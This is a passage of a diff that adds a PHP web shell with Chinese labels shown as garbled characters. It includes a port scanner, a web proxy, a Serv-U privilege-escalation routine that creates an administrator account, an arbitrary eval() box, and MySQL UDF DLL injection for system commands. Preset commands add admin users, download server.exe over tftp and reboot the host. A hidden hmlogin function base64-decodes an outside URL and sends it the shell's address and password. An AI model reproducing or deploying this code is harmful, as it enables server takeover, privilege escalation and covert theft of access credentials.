+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
+	}
+	break;
+	
+	case "scanphp":
+	html_n('<tr><td>ԭ���Ǹ��������붨���,��鿴�����жϺ��ٽ���ɾ��.<form method="POST"><br>');
+	html_input("text","path",root_dir,"���ҷ�Χ","40");
+	html_input("checkbox","pass","","ʹ��Ŀ¼����<br><br>�ű�����","",true);
+	html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));
+	html_input("submit","passreturn","����","<br><br>");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>�ҵ��ļ�:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
+	}
+	break;
+	
+	case "port":
+	$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
+	$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631';
+print<<<END
+<form method="POST">
+<div class="actall">ɨ��IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
+<div class="actall">�˿ں� <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
+<div class="actall"><input type="submit" value="ɨ��" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
+	{
+		echo '<div class="actall">';
+		$ports = explode('|', $_POST['port']);
+		for($i = 0;$i < count($ports);$i++)
+		{
+			$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
+			echo $fp ? '<font color="#FF0000">���Ŷ˿� ---> '.$ports[$i].'</font><br>' : '�رն˿� ---> '.$ports[$i].'<br>';
+			ob_flush();
+			flush();
+		}
+		echo '</div>';
+	}
+	break;
+	
+
+	case "getcode":
+if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>��ȡ URL ����ʧ��</b></p></center></body>";exit;}
+print<<<END
+<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+ <form method="POST" target="proxyframe">
+  <tr class="firstalt">
+	<td align="center"><b>���ߴ���</b></td>
+  </tr>
+  <tr class="secondalt">
+	<td align="center"  ><br><ul><li>�ñ����ܽ�ʵ�ּ򵥵� HTTP ����,������ʾʹ�����·����ͼƬ�����Ӽ�CSS��ʽ��.</li><li>�ñ����ܿ���ͨ�������������Ŀ��URL,����֧�� SQL Injection ̽���Լ�ijЩ�����ַ�.</li><li>�ñ���������� URL,��Ŀ�����������µ�IP��¼�� : {$_SERVER['SERVER_NAME']}</li></ul></td>
+  </tr>
+  <tr class="firstalt">
+	<td align="center" height=40  >URL: <input name="url" value="about:blank" type="text"  class="input" size="100" >
+ <input name="" value="���" type="submit"  class="input" size="30" >
+</td>
+  </tr>
+  <tr class="secondalt">
+	<td align="center"  ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>
+  </tr>
+</form></table>
+END;
+	break;
+	
+	case "servu":
+	$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
+print<<<END
+<div class="actall"><a href="?eanver=servu">[ִ������]</a> <a href="?eanver=servu&o=adduser">[�����û�]</a></div>
+<form method="POST">
+	<div class="actall">ServU�˿� <input name="SUPort" type="text" value="43958" style="width:300px"></div>
+	<div class="actall">ServU�û� <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
+	<div class="actall">ServU���� <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
+END;
+if($_GET['o'] == 'adduser')
+{
+print<<<END
+<div class="actall">�ʺ� <input name="user" type="text" value="envl" style="width:200px">
+���� <input name="password" type="text" value="envl" style="width:200px">
+Ŀ¼ <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
+END;
+}
+else
+{
+print<<<END
+<div class="actall">��Ȩ���� <input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"><br>
+<input name="user" type="hidden" value="envl">
+<input name="password" type="hidden" value="envl">
+<input name="part" type="hidden" value="C:\\\\"></div>
+END;
+}
+echo '<div class="actall"><input type="submit" value="ִ��" style="width:80px;"></div></form>';
+	if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
+	{
+		echo '<div class="actall">';
+		$sendbuf = "";
+		$recvbuf = "";
+		$domain  = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
+		$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
+							 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
+							 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
+		$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
+		$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "SITE MAINTENANCE\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = $domain;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = $adduser;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		if(!empty($_POST['SUCommand']))
+		{
+	 		$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "USER ".$_POST['user']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "PASS ".$_POST['password']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = $deldomain;
+	 		@fputs($sock, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($sock, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		@fclose($exp);
+		}
+		@fclose($sock);
+		echo '</div>';
+	}
+	break;
+	
+	case "eval":
+	$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
+	html_n('<tr><td><form method="POST">����д&lt;? ?&gt;��ǩ');
+	html_text("phpcode","70","15",$phpcode);
+	html_input("submit","eval","ִ��","<br><br>");
+	if(!empty($_POST['eval'])){
+	echo "<br><br>";
+    eval(stripslashes($phpcode));
+	}
+	html_n('</form>');
+	break;
+
+	case "myexp":
+	$MSG_BOX = '���ȵ���DLL,��ִ������.MYSQL�û�����ΪrootȨ��,����·�������ܼ���DLL�ļ�.';
+	$info = '�������';
+	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver';
+	if(isset($_POST['mhost']) && isset($_POST['muser']))
+	{
+		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
+		$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
+		if($conn)
+		{
+			@mysql_select_db($mdata);
+			if((!empty($_POST['outdll'])) && (!empty($_POST['mpath'])))
+			{
+				$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
+				if(@mysql_query($query,$conn))
+				{
+					$shellcode = Mysql_shellcode();
+					$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
+					if(@mysql_query($query,$conn))
+					{
+						$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
+						if(@mysql_query($query,$conn))
+						{
+							$ap = explode('/', $mpath); $inpath = array_pop($ap);
+							$query = 'Create Function state returns string soname \''.$inpath.'\';';
+							$MSG_BOX = @mysql_query($query,$conn) ? '��װDLL�ɹ�' : '��װDLLʧ��';
+						}
+						else $MSG_BOX = '����DLL�ļ�ʧ��';
+					}
+					else $MSG_BOX = 'д����ʱ��ʧ��';
+					@mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
+				}
+				else $MSG_BOX = '������ʱ��ʧ��';
+			}
+			if(!empty($_POST['runcmd']))
+			{
+				$query = 'select state("'.$sqlcmd.'");';
+				$result = @mysql_query($query,$conn);
+				if($result)
+				{
+					$k = 0; $info = NULL;
+					while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
+					$info = $infotmp;
+					$MSG_BOX = 'ִ�гɹ�';
+				}
+				else $MSG_BOX = 'ִ��ʧ��';
+			}
+		}
+		else $MSG_BOX = '����MYSQLʧ��';
+	}
+print<<<END
+<script language="javascript">
+function Fullm(i){
+	Str = new Array(11);
+	Str[0] = "ver";
+	Str[1] = "net user envl envl /add";
+	Str[2] = "net localgroup administrators envl /add";
+	Str[3] = "net start Terminal Services";
+	Str[4] = "tasklist /svc";
+	Str[5] = "netstat -ano";
+	Str[6] = "ipconfig";
+	Str[7] = "net user guest /active:yes";
+	Str[8] = "copy c:\\\\1.php d:\\\\2.php";
+	Str[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
+	Str[10] = "net start telnet";
+	Str[11] = "shutdown -r -t 0";
+	mform.sqlcmd.value = Str[i];
+	return true;
+}
+</script>
+<form id="mform" method="POST">
+<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
+<center><div class="actall">
+��ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">
+�˿� <input type="text" name="mport" value="{$mport}" style="width:110px">
+�û� <input type="text" name="muser" value="{$muser}" style="width:110px">
+���� <input type="text" name="mpass" value="{$mpass}" style="width:110px">
+���� <input type="text" name="mdata" value="{$mdata}" style="width:110px">
+</div><div class="actall">
+�ɼ���·�� <input type="text" name="mpath" value="{$mpath}" style="width:555px"> 
+<input type="submit" name="outdll" value="��װDLL" style="width:80px;"></div>
+<div class="actall">��װ�ɹ������ <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515px;">
+<select onchange="return Fullm(options[selectedIndex].value)">
+<option value="0" selected>--�����--</option>
+<option value="1">���ӹ���Ա</option>
+<option value="2">��������</option>
+<option value="3">����Զ������</option>
+<option value="4">�鿴���̺�PID</option>
+<option value="5">�鿴�˿ں�PID</option>
+<option value="6">�鿴IP</option>
+<option value="7">����guest�ʻ�</option>
+<option value="8">�����ļ�</option>
+<option value="9">ftp����</option>
+<option value="10">����telnet</option>
+<option value="11">����</option>
+</select>
+<input type="submit" name="runcmd" value="ִ��" style="width:80px;">
+<textarea style="width:720px;height:300px;">{$info}</textarea>
+</div></center>
+</form>
+END;
+	break;
+	
+
+	case "mysql_exec":
+  if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
+  {
+  	if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
+	  {
+	  	$cookietime = time() + 24 * 3600;
+	  	setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
+	  	setcookie('m_eanverport',$_POST['mport'],$cookietime);
+	  	setcookie('m_eanveruser',$_POST['muser'],$cookietime);
+	  	setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
+	  	die('���ڵ�½,���Ժ�...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');
+	  }
+  }
+print<<<END
+<form method="POST" name="oform" id="oform">
+<div class="actall">��ַ <input type="text" name="mhost" value="localhost" style="width:300px"></div>
+<div class="actall">�˿� <input type="text" name="mport" value="3306" style="width:300px"></div>
+<div class="actall">�û� <input type="text" name="muser" value="root" style="width:300px"></div>
+<div class="actall">���� <input type="text" name="mpass" value="" style="width:300px"></div>
+<div class="actall"><input type="submit" value="��½" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div>
+</form>
+END;
+break;
+
+case "mysql_msg":
+	$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
+	if($conn)
+	{
+print<<<END
+<script language="javascript">
+function Delok(msg,gourl)
+{
+	smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
+	if(confirm(smsg)){window.location = gourl;}
+}
+function Createok(ac)
+{
+	if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
+	if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
+	if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
+	return false;
+}
+</script>
+END;
+		$BOOL = false;
+		$MSG_BOX = '�û�:'.$_COOKIE['m_eanveruser'].' &nbsp;&nbsp;&nbsp;&nbsp; ��ַ:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' &nbsp;&nbsp;&nbsp;&nbsp; �汾:';
+		$k = 0;
+		$result = @mysql_query('select version();',$conn);
+		while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		echo '<div class="actall"> ���ݿ�:';
+		$result = mysql_query("SHOW DATABASES",$conn);
+		while($db = mysql_fetch_array($result)){echo '&nbsp;&nbsp;[<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
+		echo '</div>';
+		if(isset($_GET['db']))
+		{
+			mysql_select_db($_GET['db'],$conn);
+			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� '.mysql_error();}
+			if(is_array($_POST['insql']))
+			{
+				$query = 'INSERT INTO '.$_GET['table'].' (';
+				foreach($_POST['insql'] as $var => $key)
+				{
+					$querya .= $var.',';
+					$queryb .= '\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
+				$MSG_BOX = mysql_query($query,$conn) ? '���ӳɹ�' : '����ʧ�� '.mysql_error();
+			}
+			if(is_array($_POST['upsql']))
+			{
+				$query = 'UPDATE '.$_GET['table'].' SET ';
+				foreach($_POST['upsql'] as $var => $key)
+				{
+					$queryb .= $var.'=\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
+				$MSG_BOX = mysql_query($query,$conn) ? '�޸ijɹ�' : '�޸�ʧ�� '.mysql_error();
+			}
+			if(isset($_GET['del']))
+			{
+				$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
+				$good = mysql_fetch_assoc($result);
+				$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
+				foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
+				$where = $query.substr($queryc, 0, -4).';';
+				$MSG_BOX = mysql_query($where,$conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� '.mysql_error();
+			}
+			$action = '?eanver=mysql_msg&db='.$_GET['db'];
+			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� '.mysql_error();}
+			if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
+			if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
+			echo '<div class="actall"><form method="POST" action="'.$action.'">';
+			echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
+			echo '<input type="submit" name="querysql" value="ִ��" style="width:60px;height:49px;"> ';
+			echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
+			echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
+			echo '<input type="button" value="ɾ����" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
+			echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
+			if(isset($_GET['table']))
+			{
+				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
+				echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'">����</a>]</div>';
+				if(isset($_GET['edit']))
+				{
+					if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
+					echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">';
+					$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
+					$good = mysql_fetch_assoc($result);
+					$u = 0;
+					foreach($good as $var => $key)
+					{
+						$queryc .= $var.'=\''.$key.'\' AND ';
+						$type = @mysql_field_type($result, $u);
+						$len = @mysql_field_len($result, $u);
+						echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
+						$u++;
+					}
+					$where = 'WHERE '.substr($queryc, 0, -4);
+					echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
+					echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
+				}
+				else
+				{
+					$query = 'SHOW COLUMNS FROM '.$_GET['table'];
+		      $result = mysql_query($query,$conn);
+		      $fields = array();
+			  $pagesize=20;
+		      $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
+			  $numrows=$row_num;
+              $pages=intval($numrows/$pagesize);
+              if ($numrows%$pagesize) $pages++;
+              $offset=$pagesize*($page - 1);
+              $page=$_GET['p'];
+              if(!$page) $page=1;
+
+		      if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
+					echo '<table border="0"><tr>';
+					echo '<td class="toptd" style="width:70px;" nowrap>����</td>';
+					while($row = @mysql_fetch_assoc($result))
+					{
+						array_push($fields,$row['Field']);
+						echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
+					}
+					echo '</tr>';
+					if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
+					$result = mysql_query($query,$conn);
+					$v = $p;
+					while($text = @mysql_fetch_assoc($result))
+					{
+						echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> �޸� </a> ';
+						echo '<a href="#" onclick="Delok(\'��\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> ɾ�� </a></td>';
+						foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
+						echo '</tr>'."\r\n";$v++;
+					}
+					echo '</table><div class="actall">';
+                    $pagep=$page-1;
+                    $pagen=$page+1;
+                    echo "���� ".$row_num." ����¼ ";
+                    if($pagep>0) $pagenav.="  <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'>��ҳ</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'>��һҳ</a> "; else $pagenav.=" ��һҳ ";
+                    if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'>��һҳ</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'>βҳ</a>"; else $pagenav.=" ��һҳ ";
+                    $pagenav.=" �� [".$page."/".$pages."] ҳ   ����<input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />ҳ";
+                    echo $pagenav;
+					echo '</div>';
+				}
+			}
+			elseif(isset($_GET['insert']))
+			{
+				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
+				$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
+				$fieldnum = @mysql_num_fields($result);
+				echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
+				for($i = 0;$i < $fieldnum;$i++)
+				{
+					$name = @mysql_field_name($result, $i);
+					$type = @mysql_field_type($result, $i);
+					$len = @mysql_field_len($result, $i);
+					echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
+				}
+				echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
+			}
+			else
+			{
+				$query = 'SHOW TABLE STATUS';
+				$status = @mysql_query($query,$conn);
+				while($statu = @mysql_fetch_array($status))
+				{
+					$statusize[] = $statu['Data_length'];
+					$statucoll[] = $statu['Collation'];
+				}
+				$query = 'SHOW TABLES FROM '.$_GET['db'].';';
+				echo '</div><table border="0"><tr>';
+				echo '<td class="toptd" style="width:550px;"> ���� </td>';
+				echo '<td class="toptd" style="width:80px;"> ���� </td>';
+				echo '<td class="toptd" style="width:130px;"> �ַ��� </td>';
+				echo '<td class="toptd" style="width:70px;"> ��С </td></tr>';
+				$result = @mysql_query($query,$conn);
+				$k = 0;
+				while($table = mysql_fetch_row($result))
+				{
+					$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
+					echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
+					echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"> ���� </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> ɾ�� </a></td>';
+					echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
+					$k++;
+				}
+				echo '</table>';
+			}
+		}
+	}
+	else die('����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
+	if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
+break;
+
+	
+	default: html_main($path,$shellname); break;
+}
+css_foot();
+
+/*---doing---*/
+
+function do_write($file,$t,$text)
+{
+	$key = true;
+	$handle = @fopen($file,$t);
+	if(!@fwrite($handle,$text))
+	{
+		@chmod($file,0666);
+		$key = @fwrite($handle,$text) ? true : false;
+	}
+	@fclose($handle);
+	return $key;
+}
+
+function do_show($filepath){
+	$show = array();
+	$dir = dir($filepath);
+	while($file = $dir->read()){
+		if($file == '.' or $file == '..') continue;
+		$files = str_path($filepath.'/'.$file);
+		$show[] = $files;
+	}
+	$dir->close();
+	return $show;
+}
+
+function do_deltree($deldir){
+	$showfile = do_show($deldir);
+	foreach($showfile as $del){
+		if(is_dir($del)){ 
+			if(!do_deltree($del)) return false;
+		}elseif(!is_dir($del)){
+			@chmod($del,0777);
+			if(!@unlink($del)) return false;
+		}
+	}
+	@chmod($deldir,0777);
+	if(!@rmdir($deldir)) return false;
+	return true;
+}
+
+function do_showsql($query,$conn){
+	$result = @mysql_query($query,$conn);
+	html_n('<br><br><textarea cols="70" rows="15">');
+	while($row = @mysql_fetch_array($result)){
+		for($i=0;$i < @mysql_num_fields($result);$i++){
+			html_n(htmlspecialchars($row[$i]));
+		}
+	}
+	html_n('</textarea>');
+}
+
+function hmlogin($xiao=1){
+    @set_time_limit(10);
+	$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
+    $serverp = envlpass;
+    $copyurl = base64_decode('aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249');
+    $url=$copyurl.$serveru.'&p='.$serverp;
+    $url=urldecode($url);
+    $re=file_get_contents($url);
+
+$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
+$serverp = envlpass;
+if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}}
+}
+
+function do_down($fd){
+	if(!@file_exists($fd)) msg('�����ļ�������');
+	$fileinfo = pathinfo($fd);
+	header('Content-type: application/x-'.$fileinfo['extension']);
+	header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+	header('Content-Length: '.filesize($fd));
+	@readfile($fd);
+	exit;
+}
+
+function do_download($filecode,$file){
+	header("Content-type: application/unknown");
+	header('Accept-Ranges: bytes');
+	header("Content-length: ".strlen($filecode));
+	header("Content-disposition: attachment; filename=".$file.";");
+	echo $filecode;
+	exit;
+}
+
+function TestUtf8($text)
+{if(strlen($text) < 3) return false;
+$lastch = 0;
+$begin = 0;
+$BOM = true;
+$BOMchs = array(0xEF, 0xBB, 0xBF);
+$good = 0;
+$bad = 0;
+$notAscii = 0;
+for($i=0; $i < strlen($text); $i++)
+{$ch = ord($text[$i]);
+if($begin < 3)
+{ $BOM = ($BOMchs[$begin]==$ch);
+$begin += 1;
+continue; }
+if($begin==4 && $BOM) break;
+if($ch >= 0x80 ) $notAscii++;
+if( ($ch&0xC0) == 0x80 )
+{if( ($lastch&0xC0) == 0xC0 )
+{$good += 1;}
+else if( ($lastch&0x80) == 0 )
+{$bad += 1; }}
+else if( ($lastch&0xC0) == 0xC0 )
+{$bad += 1;}
+$lastch = $ch;}
+if($begin == 4 && $BOM)
+{return 2;}
+else if($notAscii==0)
+{return 1;}
+else if ($good >= $bad )
+{return 2;}
+else
+{return 0;}}
+
+function File_Str($string)
+{
+	return str_replace('//','/',str_replace('\\','/',$string));
+}
+
+function File_Write($filename,$filecode,$filemode)
+{
+	$key = true;
+	$handle = @fopen($filename,$filemode);
+	if(!@fwrite($handle,$filecode))
+	{
+		@chmod($filename,0666);
+		$key = @fwrite($handle,$filecode) ? true : false;
+	}
+	@fclose($handle);
+	return $key;
+}
+
+function File_Mode()
+{
+	$RealPath = realpath('./');
+	$SelfPath = $_SERVER['PHP_SELF'];
+	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
+	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
+}
